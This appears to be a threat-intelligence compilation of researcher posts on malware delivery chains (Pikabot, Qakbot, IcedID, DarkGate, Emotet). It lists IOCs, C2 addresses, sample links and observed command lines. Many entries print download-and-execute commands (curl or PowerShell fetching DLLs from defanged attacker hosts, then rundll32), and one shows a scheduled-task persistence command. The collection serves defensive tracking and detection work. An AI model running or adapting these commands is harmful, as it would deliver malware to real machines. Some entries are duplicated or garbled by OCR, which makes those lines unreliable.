Top 50 Techniques & Procedures

url > .zip > .js > .dll

#Pikabot - #TA577 - url > .zip > .js > .dll https://twitter.com/Cryptolaemus1/status/1709933199785418797

#Pikabot - #TA577 - url > .zip > .js > .dll

wscript PO_13670.js

cmd /c mkdir C:\ProgramData\LimdD\

WinHttp https://superrrdental.]com/H6F/dshjdsjkkd C:\ProgramData\LimdD\laminos.dll

rundll32.exe C:\ProgramData\LimdD\laminos.dll, HUF_inc_var

IOC’s https://github.com/pr0xylife/Pikabot/blob/main/Pikabot_05.10.2023.txt

url > .zip > .lnk > curl > .dll

#Pikabot- #TA577 - url > .zip > .lnk > curl > .dll https://twitter.com/Cryptolaemus1/status/1709238615904018605

#Pikabot- #TA577 - url > .zip > .lnk > curl > .dll

cmd /c TZZ.pdf.lnk

curl http://207.246.78.]68/6kQh/T7t -o UL.log

rundll32 UL.dll, HUF_inc_var

c2’s 167.86.96.]3:2222 38.242.240.]28:1194 167.86.81.]87:2222 79.141.175.]96:2078 209.126.9.]47:2078

IOC’s https://github.com/pr0xylife/Pikabot/blob/main/Pikabot_03.10.2023.txt

url > .zip > .lnk > curl > .vbs > curl > au3 > .exe

#DarkGate - #TA577 - url > .zip > .lnk > curl > .vbs > curl > au3 > .exe https://twitter.com/Cryptolaemus1/status/1708869147688419507

#DarkGate - #TA577 - url > .zip > .lnk > curl > .vbs > curl > au3 > .exe

cmd /c MFGT.lnk

curl http://136.244.92.]148/rdFR2/GbB -o fjw.vbs

wscript fjw.vbs

cmd /c mkdir c:\rqdp

curl http://81.19.135.]17:2351 -o nvptjf.au3

Autoit3.exe nvptjf.au3

IOC’s https://github.com/pr0xylife/DarkGate/blob/main/DarkGate_01.10.2023.txt

url > .zip > lnk > .vbs > .exe

#DarkGate - #TA577 - url > .zip > lnk > .vbs > .exe https://twitter.com/Cryptolaemus1/status/1708869147688419507

#DarkGate - #TA577 - url > .zip > .lnk > curl > .vbs > curl > au3 > .exe

cmd /c MFGT.lnk

curl http://136.244.92.]148/rdFR2/GbB -o fjw.vbs

wscript fjw.vbs

cmd /c mkdir c:\rqdp

curl http://81.19.135.]17:2351 -o nvptjf.au3

Autoit3.exe nvptjf.au3

IOC’s https://github.com/pr0xylife/DarkGate/blob/main/DarkGate_01.10.2023.txt

url > .xll > curl > .dll

#IcedID - #TA577 - url > .xll > curl > .dll https://twitter.com/Cryptolaemus1/status/1706635492224024765

#IcedID - #TA577 - url > .xll > curl > .dll

EXCEL.EXE Sr.xll

cmd /c curl -o c:\users\public\9y.dat http://135.125.177.]95/syK/3IldTx

rundll32 c:\users\public\9y.dat scab /k besogon728

Samples 👇

https://bazaar.abuse.ch/sample/310b9b7f54880f2142882e39637d73dfc8542eab06ac1bb9ec597b801979b4d8/

https://bazaar.abuse.ch/sample/f45d0303851f913cef47b612211d603449cedaab4df3484048c8473b9d71d96a/

IOC’s https://github.com/pr0xylife/IcedID/blob/main/icedID_09.26.2023.txt

pdf > url > .js > ps > .dll

#Qakbot - BB32 - pdf > url > .js > ps > .dll https://twitter.com/Cryptolaemus1/status/1669669651486240769

#Qakbot - BB32 - pdf > url > .js > ps > .dll

wscript Cx.js

powershell $res = “http://149.154.158.]191/znxlW/MGjrJji3RDB”; foreach ($Fo in $res) try {$Go = FromBase64($Fo)); iwr $Go -O C:\ProgramData\99.9.dll

rundll32 C:\ProgramData\99.9.dll,must

IOC’s https://github.com/pr0xylife/Qakbot/blob/main/Qakbot_BB32_16.06.2023.txt

.pdf > .zip > curl > .dll

#Qakbot - obama268 - .pdf > .zip > curl > .dll https://twitter.com/Cryptolaemus1/status/1669024540482052103

#Qakbot - obama268 - .pdf > .zip > curl > .dll

wscript CalculationOfCosts-1337.js

cmd.exe /c mkdir C:\Koltes\Fertiol & curl https://rapiska.]com/1337dat –output C:\Koltes\Fertiol\Floster.OCX

rundll32 C:\Koltes\Fertiol\Floster.OCX,must

IOC’s https://github.com/pr0xylife/Qakbot/blob/main/Qakbot_obama268_14.06.2023.txt

url > .zip > .js > curl > .dll

#Qakbot - BB32 - url > .zip > .js > curl > .dll https://twitter.com/Cryptolaemus1/status/1668965414867443712

#Qakbot - BB32 - url > .zip > .js > curl > .dll

wscript.exe docu_DF631_Jun_14_1.js

curl.exe -o c:\users\public\amounted.tmp http://192.121.17.]149/QmVep/DB278

conhost.exe rundll32.exe amounted.tmp,must

rundll32.exe amounted.tmp,must

IOC’s https://github.com/pr0xylife/Qakbot/blob/main/Qakbot_BB32_14.06.2023.txt

.pdf > .zip > .js > .msi > .dll

#Qakbot - obama266 - .pdf > .zip > .js > .msi > .dll https://twitter.com/Cryptolaemus1/status/1664300425829404673

#Qakbot - obama266 - .pdf > .zip > .js > .msi > .dll

wscript.exe ProjectFunding_1337_Jun01.js

msiexec.exe /V

rundll32.exe C:\Users\Admin\AppData\Local\AdobeAcrobatPDFBrowserPlugin\main.dll,next

IOC’s https://github.com/pr0xylife/Qakbot/blob/main/Qakbot_obama266_01.06.2023.txt

BB19 - .html > url > .js > .ps > .dll

#Pikabot - #Qakbot- BB19 - .html > url > .js > .ps > .dll https://twitter.com/pr0xylife/status/1636402413912354816

#Pikabot - #Qakbot- BB19 - .html > url > .js > .ps > .dll

wscript.exe LL.js

$Mag = (https://hanika-inc.]com/mjnPR9/uo)

foreach ($washman in $Mag) {try {Invoke-WebRequest $washman -O $env:TEMP\Sulfuryl.dll

rundll32 $env:TEMP\Sulfuryl.dll,LS88

IOC’s https://github.com/pr0xylife/Qakbot/blob/main/Qakbot_BB19_Pikabot_16.03.2023.txt

.pdf > .zip > .wsf > xmlhttp > .dll

#Qakbot - obama264 - .pdf > .zip > .wsf > xmlhttp > .dll https://twitter.com/Cryptolaemus1/status/1661413082982170628

#Qakbot - obama264 - .pdf > .zip > .wsf > xmlhttp > .dll

wscript.exe Claim_C736.wsf

var u = “http://45.76.58.]72/a0UFMZnC6ltxphw.dat” http://http.open(“GET”, u[i], false)

conhost.exe rundll32.exe C:\Users\Public\amLE5PKlGAXrhpU.dat,bind

IOC’s https://github.com/pr0xylife/Qakbot/blob/main/Qakbot_obama264_24.05.2023.txt

.one > .iso > .chm > ps > .dll

#Qakbot - BB24 - .one > .iso > .chm > ps > .dll https://twitter.com/Cryptolaemus1/status/1648632165742137344

#Qakbot - BB24 - .one > .iso > .chm > ps > .dll

hh E:\README-JRN44.chm

powershell $sensillum = (“https://hotellosmirtos.]com/sjn/Tn0Q3nieE”)

foreach ($form in $sensillum) {try {wget $form -O $env:TEMP\hexatetra

rundll32 $env:TEMP\hexatetra,Motd

IOC’s https://github.com/pr0xylife/Qakbot/blob/main/Qakbot_BB24_19.04.2023.txt

.one > .img > .wsf > ps > .dll

#Qakbot - BB22 - .one > .img > .wsf > ps > .dll https://twitter.com/Cryptolaemus1/status/1643614470164340736

#Qakbot - BB22 - .pdf > .zip > .wsf > ps > .dll

wscript AprilDetails.wsf

powershell $spear = (“https://kmphi.]com/FWovmB/8oZ0BOV5HqEX”)

foreach ($banter in $spear) {try {wget $banter -O $env:TEMP\Lownesses

rundll32 $env:TEMP\Lownesses,X555

IOC’s https://github.com/pr0xylife/Qakbot/blob/main/Qakbot_BB22_05.04.2023.txt

url > .js > ps > .dll

#Qakbot - BB33 - url > .js > ps > .dll https://twitter.com/Cryptolaemus1/status/1671489179262369792

#Qakbot - BB33 - url > .js > ps > .dll

wscript Ix.js

powershell -encodedcommand $N = “http://151.236.14.]60/c1oHe/q9cRd2n0”

md C:\ProgramData\SNWSlycop

iwr $Brunt -O C:\ProgramData\SNWSlycop\joind.dll

rundll32 C:\ProgramData\SNWSlycop\joind.dll

IOC’s https://github.com/pr0xylife/Qakb

Thread-hijacked email -> PDF Attachment -> payload download -> Password-Protected Zip -> ISO -> LNK -> CMD -> DLL

Thread-hijacked email -> PDF Attachment -> payload download -> Password-Protected Zip -> ISO -> LNK -> CMD -> DLL c2: ebothlips.com https://twitter.com/k3dg3/status/1612860949773389835

Today’s #IcedID “1421378695” dropped via PDFs with payloads hosted on firebasestorage.googleapis.com.*

Thread-hijacked email -> PDF Attachment -> payload download -> Password-Protected Zip -> ISO -> LNK -> CMD -> DLL c2: ebothlips.com

https://bazaar.abuse.ch/sample/1796aef0940e800bcb2556782f92a7874422bbdfdda24e6658e43db4b0916850/

hijacked emails > PDF > Cookie Reloaded URLs (prometheus tds)-> JS > payload via CURL > IcedID

hijacked emails > PDF > Cookie Reloaded URLs (prometheus tds)-> JS > payload via CURL > IcedID https://twitter.com/k3dg3/status/1697331227940798731

#IcedID “4240553492” rolling in

c2: oopscokir.com ProjectID: 4240553492

filename: inv_ug_08-31_[0-9]{3,5}.pdf Curl payload ex: hxxps://avestainfratech.com/out/t.php

tldr: hijacked emails > PDF > Cookie Reloaded URLs (prometheus tds)-> JS > payload via CURL > IcedID

email > PDF > URL > Keitaro redirect > zip > pass > exe

email > PDF > URL > Keitaro redirect > zip > pass > exe https://twitter.com/k3dg3/status/1683544196341219341

Incoming #IcedID “1561373935” filename: inv-details-jul23.pdf

Loader C2: filtaferamoza.com

email > PDF > URL > Keitaro redirect > zip > pass > exe

https://tria.ge/230724-w1dlaaha6w/behavioral1 https://bazaar.abuse.ch/sample/8b5529d29aeaf195889ebad68f2c3a390845e173edfec923acaf25fed824a529/

url > zip > lnk url > xll pdf > url > xll > msi

url > zip > lnk url > xll pdf > url > xll > msi https://twitter.com/pr0xylife/status/1705331101365891455

#TA577 - Back on the scene pushing #Darkgate

Time to resume tracking operations, welcome back Tramp.

Distro 👇

url > zip > lnk url > xll pdf > url > xll > msi

Samples 👇

https://bazaar.abuse.ch/sample/026f4c95783ed33bc31c16a9a80842fa4a8efa4f67dff5a4739f90a8bc49a219/

https://bazaar.abuse.ch/sample/2eee7af95e457c97fb0bc3a91a00931c3c33e72f864e9bf4289565cba15ae484/

https://bazaar.abuse.ch/sample/bb2434f22b2fb7801cdd2b81e2b28a41a2beb2dc72b3d07ffec0e0f120c7a4bf/

https://bazaar.abuse.ch/sample/5bc060bd720757919db4f54f97e74b7110c67cf934423f86ffd483c7e2c367e2/

.zip > .doc > .dll

#Emotet- epoch4 - .zip > .doc > .dll https://twitter.com/pr0xylife/status/1633096910008467459

#Emotet- epoch4 - .zip > .doc > .dll

WINWORD.EXE /n INVOICE 589 03_23.doc /o

https://midcoastsupplies.]com].au/configNQS/Es2oE4GEH7fbZ/?135704

regsvr32.exe C:\Windows\system32\MSBjdGgEfuEG\evPaAyJzdCSx.dll

IOC’s https://github.com/pr0xylife/Emotet/blob/main/e4_emotet_07.03.2023.txt

.pdf > .url > .zip > .iso > .cmd > .exe

#IcedID - .pdf > .url > .zip > .iso > .cmd > .exe https://twitter.com/pr0xylife/status/1616464950138109953

#IcedID - .pdf > .url > .zip > .iso > .lnk > .cmd > .dll

cmd.exe /c REF_Document.lnk

cmd.exe /c sacsimsapI.cmd

rundll32 standing.dat,init

c2’

http://umousteraton.]com

Samples here 👇

https://bazaar.abuse.ch/sample/3390b1d8560f565ed5e2a60df63ce24abe0ef3da514cf5645dd732f7e5cdbbae/

https://bazaar.abuse.ch/sample/ad174760985c5418b4a3c3a97cd8d7658e3bbb7030f72f2eff9ff97e57f200bd/

IOC’s https://github.com/pr0xylife/IcedID/blob/main/icedID_20.01.2023.txt

url > .zip > .one > .hta > .curl > .dll

#Qakbot - BB12 - url > .zip > .one > .hta > .curl > .dll https://twitter.com/pr0xylife/status/1620751340485120001

#Qakbot - BB12 - url > .zip > .one > .hta > .curl > .dll

mshta Open.hta

curl -o C:\ProgramData\index.png –url billmanagersystem.]com/ikA/d.gif

rundll32 C:\ProgramData\index.png,Wind

Samples 👇

https://bazaar.abuse.ch/sample/6c49b4d40b2925a4e5910e4157f7d302acf9203192187d3d1d178c258239f1c3/

https://bazaar.abuse.ch/sample/284f0fabbdfc1172cb1cbf74473321668c4b31789d93158669f6735bec124817/

IOC’s https://github.com/pr0xylife/Qakbot/blob/main/Qakbot_BB12_01.02.2023.txt

.pdf > .zip > .js > .dll

#Qakbot - obama270 - .pdf > .zip > .js > .dll https://twitter.com/Cryptolaemus1/status/1671528958192496640

#Qakbot - obama270 - .pdf > .zip > .js > .dll

wscript RrwuR.js

powershell -enc $bread = “https://viltare.]com/PlI6qXoN.dat”

md C:\ProgramData\SNWSPinna

iwr $Medio -O C:\ProgramData\SNWSPinna\Pinna.dll

rundll32 C:\ProgramData\SNWSPinna\Pinna.dll

IOC’s https://github.com/pr0xylife/Qakbot/blob/main/Qakbot_obama270_21.06.2023.txt

url > .zip > .vhd > .lnk > .cmd > .cmd > .dll

#Qakbot - BB09 - url > .zip > .vhd > .lnk > .cmd > .cmd > .dll https://twitter.com/pr0xylife/status/1599787375311212544

#Qakbot - BB09 - url > .zip > .vhd > .lnk > .cmd > .cmd > .dll

cmd /c HG.lnk

cmd.exe /q /c pests.cmd

cmd.exe /K dispersers.cmd system rundl

rundll32 erect.tmp,DrawThemeIcon

Samples 👇

https://bazaar.abuse.ch/sample/15c1feb12ecedafc233ebec6e0893ed0294f91ad48da9cc89c571ce3e316980d/

https://bazaar.abuse.ch/sample/c6887e515b36694e8e738c0df7610014e084bcce80ee13c998087471daf039a4/

IOC’s https://github.com/pr0xylife/Qakbot/blob/main/Qakbot_BB09_05.12.2022.txt

url > .zip > .xlsb > .dll

#Qakbot - bb - url > .zip > .xlsb > .dll https://twitter.com/pr0xylife/status/1577671455336194049

#Qakbot - bb - url > .zip > .xlsb > .dll

CreateDirectoryA C:\Hefagga

CreateDirectoryA C:\Hefaggad\Ukdfaovkga

http://metroberrylocalmarketing.]com/7z8b/0.html

regsvr32 /s calc

regsvr32 C:\Hefaggad\Ukdfaovkga\Buuefafa.dll

https://bazaar.abuse.ch/sample/d3788e69dd125449af3d985de93701c49cef0658bc98e3b449185f86cbee027d/

IOC’s https://github.com/pr0xylife/Qakbot/blob/main/Qakbot_BB_05.10.2022.txt

.html > .zip > .iso > .lnk > .png > .dll

#IcedID - .html > .zip > .iso > .lnk > .png > .dll https://twitter.com/pr0xylife/status/1575903382505590784

#IcedID - .html > .zip > .iso > .lnk > .png > .dll

cmd.exe /c start ru^n^d^l^l3^2 2cdb83ee-c76c-4d7c-b9bc-2f4aab08f773.-Tf,PluginInit

rundll32 2cdb83ee-c76c-4d7c-b9bc-2f4aab08f773.-Tf,PluginInit

https://bazaar.abuse.ch/sample/0ab12d65800f3e7e6089fe3c534911f0b42d9175bcf955e937edd39e8bb2c13a/

c2 http://triskawilko.]com

IOC’s https://github.com/pr0xylife/IcedID/blob/main/icedID_30.09.2022.txt

url > .zip > .lnk > curl > wscript > curl > .dll

#Qakbot - bb - url > .zip > .lnk > curl > wscript > curl > .dll https://twitter.com/pr0xylife/status/1570064310923304962

#Qakbot - bb - url > .zip > .lnk > curl > wscript > curl > .dll

MD “C:\ProgramData\A_Np\fcA”

curl.exe -o %ProgramData%\A_Np\fcA\GCk.js ap2web.]com/MwS/13.html

wscript.exe GCk.js

paritoys.]com/9nD/130.html

regsvr32 REPORT_9MyMg_.SRm.IH.dll

IOC’s https://github.com/pr0xylife/Qakbot/blob/main/Qakbot_BB_14.09.2022.txt

.zip > .docm > .curl > .dll

#IcedID - .zip > .docm > .curl > .dll https://twitter.com/pr0xylife/status/1565354363765215238

#IcedID - .zip > .docm > .curl > .dll

cmd /c curl http://193.178.210.]58/-o c:\ProgramData\MH4SG6MYDDyi.dll && rundll32 c:\ProgramData\MH4SG6MYDDyi.dll,#1

https://bazaar.abuse.ch/sample/133245a337b1703f3940d8ca3907c9bb7ec6b47701257766e70d7c9318571ce5/

c2 http://donorcabr.]com/

IOC’s https://github.com/pr0xylife/IcedID/blob/main/icedID_01.09.2022.txt

EML>.tar.gz>.exe

EML>.tar.gz>.exe https://twitter.com/Tac_Mangusta/status/1709107786078982211

EML>zip pw>.url>SMB>zip>vbs>certutil

EML>zip pw>.url>SMB>zip>vbs>certutil>#Ursnif https://twitter.com/JAMESWT_MHT/status/1706919214588506202

pec > .zip > .url > .exe (smb)

pec > .zip > .url > .exe (smb) https://twitter.com/Tac_Mangusta/status/1703716708236570650

Mail(stolen old conv) > .zip > .js > .7z (psw) > .dll(key)

Mail(stolen old conv) > .zip > .js > .7z (psw) > .dll(key) https://twitter.com/Tac_Mangusta/status/1702247512529060244

USB > .lnk > .ps1 > .exe

USB > .lnk > .ps1 > .exe https://twitter.com/Tac_Mangusta/status/1678185981344731137

LZH > EXE

LZH > EXE https://twitter.com/reecdeep/status/1696539420219056590

Phish -> .rar -> .cmd -> .ps1 -> AutoIT -> force shutdown -> autorun persistence leading to execution of Metamorfo DLL’s

Phish -> .rar -> .cmd -> .ps1 -> AutoIT -> force shutdown -> autorun persistence leading to execution of #Metamorfo DLL’s https://twitter.com/0xToxin/status/1694756006889206044

Bumblebee

#Bumblebee Infection Flow TTPs🐝 [+] Mark-of-the-Web Bypass: IMG (T1553.005) [+] Malicious File: LNK (T1204.002) [+] Windows Command Shell: BAT (T1059.003) [+] Rename System Utilities: copy & rename (T1036.003) [+] Scheduled Task: schtasks.exe (T1053.005) [+] Rundll32(T1218.011)

https://twitter.com/Max_Mal_/status/1600847676270006272

HTML to PluginInit

[+] HTML Smuggling (T1027.006) [+] Msiexec - .msi stager (T1218.007) [+] Rundll32 - .dll loader (T1218.011) [+] New export func: init, a short version of PluginInit🔥

#DFIR exec flow: msi > [RPC Install] > msiexec > rundll32 https://twitter.com/Max_Mal_/status/1600433854937866240

EML>Pdf>Url>js>url>js>url>PEDLL

EML>Pdf>Url>js>url>js>url>PEDLL> https://twitter.com/JAMESWT_MHT/status/1678982791705378816

Onenote sample > Bat > curl url > Dll

Onenote sample > Bat > curl url > Dll https://twitter.com/JAMESWT_MHT/status/1641782661503918081

bat>certutil>exe>ps1>dropbox>2stage>certutil>fake invoice pdf

bat>certutil>exe>ps1>dropbox>2stage>certutil>fake invoice pdf https://twitter.com/JAMESWT_MHT/status/1658785799394000898

Qakbot js

Qakbot - JS -> DLL -> Sacrificial Process WmiPrvSE conhost =› conhost. exe conhost. exe conhost. exe rund1132. exe C: \Users \alice\noises.dat, next conhost =› conhost. exe conhost. exe rundll32. exe C: \Users\alice\noises.dat, next conhost => conhost. exe rund1132. exe C: \Users \alice \noises. dat, next rund1132 => rund1132.exe C: \Users \alice \noises.dat, next rund1132 => rundl132.exe C: \Users \alice\noises.dat, next explorer C: \Windows \SysW0W64 \explorer. exe

https://twitter.com/ACEResponder

Pikabot

#Pikabot execution chain: ➡️ rundll32.exe .dll,Test (initial execution) ➡️ WerFault.exe (connects to PikaBot C2, in our case it's 45.85.235[.]39) ➡️ whoami.exe /all ➡️ ipconfig.exe /all ➡️ schtasks.exe /Create /F /TN "{B220CD07-2339-4E8E-8FDD-DF2C6D1B42DC}" /TR "cmd /q /c start /min \"\" powershell \"$HydrofluoboricInclaspedNonredressing = Get-ItemProperty -Path HKCU:\\Software\\HydrofluoboricInclaspedNonredressing; powershell -encodedcommand $HydrofluoboricInclaspedNonredressing.ParodyRoisterImpressibly\"" /SC HOURLY /MO (example of the scheduled task as a persistence mechanism, the registry values and task name can change) NOTE: whoami, ipconfig, schtasks were spawned from WerFault.exe ➡️ PowerShell execution: powershell "$HydrofluoboricInclaspedNonredressing = Get-ItemProperty -Path HKCU:\\Software\\HydrofluoboricInclaspedNonredressing; powershell -encodedcommand $HydrofluoboricInclaspedNonredressing.ParodyRoisterImpressibly" ➡️ PowerShell execution (child process): "powershell.exe" -encodedcommand [REDACTED] -> decoded output is provided in the screenshot ➡️ curl.exe --url hxxps://192.9.135[.]73:1194/neurophysiologist/D3CAP09duSVlX?TransitorilyVerbosities=y4EB3Rb -A upb4geF6poodkVW2YaySEzk4C32sCDV -X POST --insecure (sends the POST request out to one of the IPs in the decoded output) ➡️ powershell.exe start rundll32 $env:APPDATA\Microsoft\HydrofluoboricInclaspedNonredressing\ParodyRoisterImpressibly.dll, Test (starts the PikaBot payload) ➡️ The POST request sent to C2: {"ParodyRoisterImpressibly":"CgBzAHQAYQByAHQAIAByAHUAbgBkAGwAbAAzADIAIAAkAGUAbgB2ADoAQQBQAFAARABBAFQAQQBcAE0AaQBjAHIAbwBzAG8AZgB0AFwASAB5AGQAcgBvAGYAbAB1AG8AYgBvAHIAaQBjAEkAbgBjAGwAYQBzAHAAZQBkAE4AbwBuAHIAZQBkAHIAZQBzAHMAaQBuAGcAXABQAGEAcgBvAGQAeQBSAG8AaQBzAHQAZQByAEkAbQBwAHIAZQBzAHMAaQBiAGwAeQAuAGQAbABsACwAIABUAGUAcwB0AAoA","success":"true"} (Base64-encoded string contains the command to execute the PikaBot DLL payload on the host)

https://twitter.com/AnFam17

#Qakbot DLL Side-Loading TTPs DFIR exec flow: ZIP > EXE&DLL > curl > rundll32

#Qakbot DLL Side-Loading #TTPs #DFIR exec flow: ZIP > EXE&DLL > curl > rundll32 https://twitter.com/Max_Mal_

Redirect Services

⚠️ Legitimate Services Abused For Phishing Purposes

1- Bing Redirect - https://app.any.run/tasks/9a1e55eb-05c5-499b-b995-d5ef0e275394?utm_source=twitter&utm_medium=post&utm_campaign=task1&utm_content=linktotask&utm_term=031023/

2- Google AMP - https://app.any.run/tasks/544a7608-87b2-4e37-9804-556151684be5?utm_source=twitter&utm_medium=post&utm_campaign=task2&utm_content=linktotask&utm_term=031023/

3- Microsoft Customer Voice - https://app.any.run/tasks/e239ecc0-74cf-45ed-9f15-f4a9b35fe65e?utm_source=twitter&utm_medium=post&utm_campaign=task3&utm_content=linktotask&utm_term=031023/

4- Cloudflare R2 Dev Bucket - https://app.any.run/tasks/41d192ee-95d9-4aed-a8eb-7b1819f5865c?utm_source=twitter&utm_medium=post&utm_campaign=task4&utm_content=linktotask&utm_term=031023/

https://twitter.com/anyrun_app/status/1709193919118844267

VBS -> PowerShell -> Stego Hidden Payload -> Downloader DLL -> LimeRAT

VBS -> PowerShell -> Stego Hidden Payload -> Downloader DLL -> LimeRAT

https://twitter.com/dark0pcodes